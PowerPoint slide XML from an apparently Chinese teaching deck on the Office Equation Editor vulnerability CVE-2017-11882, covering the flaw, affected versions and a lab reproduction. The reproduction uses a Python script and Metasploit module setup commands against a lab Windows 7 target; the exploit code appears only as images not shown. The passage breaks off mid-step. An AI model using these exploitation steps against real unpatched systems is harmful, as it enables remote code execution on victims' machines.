            <a:lvl8pPr marL="3429000" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1680057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一、漏洞介绍</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45503" y="1339348"/>
            <a:ext cx="11483077" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日，微软发布了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月份的安全补丁更新，其中比较引人关注的莫过于悄然修复了潜伏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年之久的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>远程代码执行漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CVE-2017-11882</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）。该漏洞为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>内存破坏漏洞，影响目前流行的所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>由于漏洞影响面较广，漏洞披露后，金睛安全研究团队持续对漏洞相关攻击事件进行关注。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	CVE-2017-11882</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>属于缓冲区溢出类型漏洞，该漏洞出现在模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>EQNEDT32.EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中，该模块为公式编辑器，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的安装过程中被默认安装。该模块以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>OLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>技术（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Object Linking and Embedding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，对象链接与嵌入）将公式嵌入在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文档内。过覆盖函数的返回地址，可执行任意代码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBC98F9-9B62-4760-AD4A-C493EB5DA4D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2276669" y="1041538"/>
            <a:ext cx="8226490" cy="5741817"/>
            <a:chOff x="2276669" y="1041538"/>
            <a:chExt cx="8226490" cy="5741817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE2B28D5-4E85-4394-8423-E40D703584DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2276669" y="1041538"/>
              <a:ext cx="8226490" cy="5741817"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC4B10F-C339-45E8-8826-46390A8A2057}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5437114" y="5631796"/>
              <a:ext cx="4172937" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>（图为启动</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>office 2016 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>公式编辑器</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3.0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31612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一、漏洞介绍</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54833" y="1665920"/>
            <a:ext cx="11483077" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>★漏洞影响版本：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Office 365</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft Office 2000      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft Office 2003      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft Office 2007 Service Pack 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft Office 2010 Service Pack 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft Office 2013 Service Pack 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Microsoft Office 2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="635076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二、漏洞复现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226841" y="1003447"/>
            <a:ext cx="11483077" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows 7 64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>位</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>软件版本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office 2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>专业增强版（已激活）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>执行环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>python 2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>复现脚本部分代码如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0EAD0D-767B-4A28-9F6A-60B67A46C055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4068147" y="1786387"/>
            <a:ext cx="8123853" cy="5071613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4157133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二、漏洞复现</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354461" y="1020717"/>
            <a:ext cx="3499081" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>成功弹出计算器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F2366B2-377F-498B-A6D8-52BC044CBA91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3097762" y="1020717"/>
            <a:ext cx="8338458" cy="5913432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1979919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843558"/>
            <a:ext cx="7567229" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击机：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>靶机：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows 7 64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>位（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.131</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>软件环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office 2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>专业增强版</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>执行环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>python 2.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（部署在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	将下载好的漏洞模块移到库中：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>mv cve_2017_11882.rb /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-framework/modules/exploits/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC1443D-2C25-4817-8D03-038DF2B7293C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="51547"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236534" y="3660779"/>
            <a:ext cx="9146814" cy="2938438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187268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1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务，打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>msconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E860F9-2902-407A-88AB-911038BF6DB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4513638" y="940688"/>
            <a:ext cx="7678362" cy="5917312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134737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1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>cve_2017_11882 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>search cve_2017_11882</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91F448F-AC47-4F14-AF9D-845821F39E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4328809" y="849960"/>
            <a:ext cx="7863191" cy="6029456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1702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678159" y="986300"/>
            <a:ext cx="9688029" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
